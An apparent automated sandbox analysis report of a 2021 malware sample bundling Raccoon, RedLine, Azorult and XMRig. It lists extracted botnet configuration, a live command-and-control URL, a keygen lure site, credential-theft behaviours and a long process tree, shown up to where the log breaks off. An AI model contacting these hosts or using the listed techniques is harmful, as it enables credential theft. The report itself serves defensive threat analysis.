Analysis

  • max time kernel
    1798s
  • max time network
    1794s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    19-04-2021 16:38

General

Malware Config

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 17 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1104
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Modifies registry class
      PID:2864
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2644
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2616
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/8c73583673768946q1.html
        1⤵
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2256
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7fffcec34f50,0x7fffcec34f60,0x7fffcec34f70
          2⤵
            PID:764
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1708 /prefetch:2
            2⤵
              PID:2076
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1860 /prefetch:8
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:188
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1872 /prefetch:8
              2⤵
                PID:288
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:1
                2⤵
                  PID:1320
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
                  2⤵
                    PID:2652
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8
                    2⤵
                      PID:3804
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                      2⤵
                        PID:2272
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                        2⤵
                          PID:2116
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
                          2⤵
                            PID:196
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
                            2⤵
                              PID:3848
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5020 /prefetch:8
                              2⤵
                                PID:4520
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3408 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4712
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6240 /prefetch:8
                                2⤵
                                  PID:4788
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6412 /prefetch:8
                                  2⤵
                                    PID:4832
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6268 /prefetch:8
                                    2⤵
                                      PID:4844
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6652 /prefetch:8
                                      2⤵
                                        PID:4904
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6280 /prefetch:8
                                        2⤵
                                          PID:4916
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8
                                          2⤵
                                            PID:4976
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6544 /prefetch:8
                                            2⤵
                                              PID:4988
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6508 /prefetch:8
                                              2⤵
                                                PID:5048
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5704 /prefetch:8
                                                2⤵
                                                  PID:5084
                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                  2⤵
                                                    PID:5096
                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x240,0x244,0x248,0x21c,0x200,0x7ff7152da890,0x7ff7152da8a0,0x7ff7152da8b0
                                                      3⤵
                                                        PID:4132
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6684 /prefetch:8
                                                      2⤵
                                                        PID:2700
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6576 /prefetch:8
                                                        2⤵
                                                          PID:4384
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6556 /prefetch:8
                                                          2⤵
                                                            PID:4428
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5312 /prefetch:8
                                                            2⤵
                                                              PID:4544
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6740 /prefetch:8
                                                              2⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4572
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5288 /prefetch:8
                                                              2⤵
                                                                PID:4744
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6744 /prefetch:8
                                                                2⤵
                                                                  PID:4736
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6716 /prefetch:8
                                                                  2⤵
                                                                    PID:828
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6692 /prefetch:8
                                                                    2⤵
                                                                      PID:4876
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7076 /prefetch:8
                                                                      2⤵
                                                                        PID:4928
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8
                                                                        2⤵
                                                                          PID:5012
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5628 /prefetch:8
                                                                          2⤵
                                                                            PID:4372
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5464 /prefetch:8
                                                                            2⤵
                                                                              PID:4376
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5524 /prefetch:8
                                                                              2⤵
                                                                                PID:5016
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5564 /prefetch:8
                                                                                2⤵
                                                                                  PID:5044
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5480 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5072
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6528 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4480
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7692 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4300
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6276 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4368
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7696 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4796
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8088 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4292
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8212 /prefetch:8
                                                                                              2⤵
                                                                                                PID:3916
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8076 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:4304
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8512 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:1532
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8620 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5132
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8752 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:5200
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8876 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5212
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7720 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:5272
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8292 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:5312
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7364 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5348
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:5360
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3772 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5476
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5528
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5620
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7404 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5736
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7360 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5780
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5856
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1700,7247043732604765620,3798909807770271010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2112 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5876
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                    1⤵
                                                                                                                      PID:2472
                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                      1⤵
                                                                                                                        PID:2456
                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • Modifies registry class
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1804
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                          2⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Modifies registry class
                                                                                                                          PID:4960
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                          2⤵
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Modifies data under HKEY_USERS
